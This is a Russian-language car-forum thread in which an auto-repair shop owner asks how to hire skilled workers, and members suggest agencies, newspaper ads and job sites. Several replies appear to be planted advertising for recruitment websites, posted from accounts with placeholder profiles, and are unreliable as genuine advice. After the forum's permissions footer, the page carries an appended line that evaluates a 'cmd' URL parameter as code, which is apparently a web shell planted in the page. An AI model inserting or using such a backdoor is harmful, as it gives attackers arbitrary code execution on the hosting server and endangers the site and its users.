+ Ответить в теме
Показано с 1 по 9 из 9

Тема: Рабочие кадры


  1. #1
    Мимо проходил tatarin is on a distinguished road Аватар для tatarin
    Регистрация
    22.12.2018
    Откуда
    .......
    Машина
    ......
    Сообщений
    14

    Рабочие кадры

    Ребята, не так давно открыл свой автосервис по ремонту самого различного автотранспорта в Московской области. А проблема в том, что мне не хватает опытных квалифицированных рабочих. Решил первым делом поискать решения данной проблемы в интернете. И вот мое внимание привлек сайт, где предлагают услуги по подбору кадров https://antcap.ru/podbor-personala/ . Так что мне есть над чем серьезно подумать. Слушайте, а как Вы сами находили себе рабочих? Может и мне что-нибудь посоветуете?

  2. #2
    Мимо проходил iljas is on a distinguished road Аватар для iljas
    Регистрация
    23.12.2018
    Откуда
    .
    Машина
    Volkswagen
    Сообщений
    12
    Когда мне нужны были хорошие надежные работники с опытом работы для своей компании, то обращался за помощью в одно агентство, где мне подобрали первоклассный персонал.

  3. #3
    Мимо проходил masik is on a distinguished road Аватар для masik
    Регистрация
    28.12.2018
    Откуда
    .
    Машина
    Golf 1
    Сообщений
    11
    А я вам советую подать объявление в какую-нибудь газету, что будет недорого и по деньгам, и думаю найдете быстро много желающих людей работать на вас. Сам так когда-то и делал.

  4. #4
    Мимо проходил martin is on a distinguished road Аватар для martin
    Регистрация
    22.12.2018
    Откуда
    World
    Машина
    Golf Alltrack
    Сообщений
    11
    О чем вы все говорите, да можно самому просмотреть объявления в том же интернете, где очень много людей самых различных профессий предлагают свои услуги и готовы наняться на работу.

  5. #5
    Мимо проходил Rostikk is on a distinguished road Аватар для Rostikk
    Регистрация
    05.12.2018
    Сообщений
    55
    Цитата Сообщение от martin Посмотреть сообщение
    О чем вы все говорите, да можно самому просмотреть объявления в том же интернете, где очень много людей самых различных профессий предлагают свои услуги и готовы наняться на работу.
    Представьте сколько времени у вас уйдет на просмотр объявлений, тем более, что большая часть из них скорее всего уже неактуальная. Проще как раз самому подать объявления. А есть еще сервисы размещения вакансий на сайтах о работе https://www.hrhome.ru. Вы просто создаете вакансию, а объявления будут размещены на более, чем 20 крупнейших сайтах о работе. Вам останется только просматривать отклики потенциальных работников, причем все это будет собрано в одном месте. Удобно, на мой взяглд. Может вам лучше такой услугой воспользоваться? Это будет стоить дешевле услуг кадрового агентства

  6. #6
    Мимо проходил urjin is on a distinguished road Аватар для urjin
    Регистрация
    08.02.2018
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    14
    martin, это понятно, но ведь нужно понимать, где стоит искать этих ищущих вашу работу людей, согласитесь... не по объявлениям ведь на заборе.

  7. #7
    Мимо проходил Mox is on a distinguished road Аватар для Mox
    Регистрация
    13.02.2018
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    9
    Мы в свои магазины давно уже людей рекрутим на автомате через порталы поиска работы в сфере ритейла. Есть такой специализированный ресурс https://www.naim.ru/ называется, там постоянно висит объявление, по которому у нас всегда есть звонки. Если нужны низкоквалифицированные кадры, рекомендую тоже попробовать этот ресурс.

  8. #8
    Мимо проходил urjin is on a distinguished road Аватар для urjin
    Регистрация
    08.02.2018
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    14
    Во сколько обходится пользование площадкой?

  9. #9
    Мимо проходил Var is on a distinguished road Аватар для Var
    Регистрация
    06.01.2020
    Откуда
    мир
    Сообщений
    9
    Полезный ресурс.

+ Ответить в теме

Похожие темы

  1. Ответов: 0
    Последнее сообщение: 15.09.2007, 23:18

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}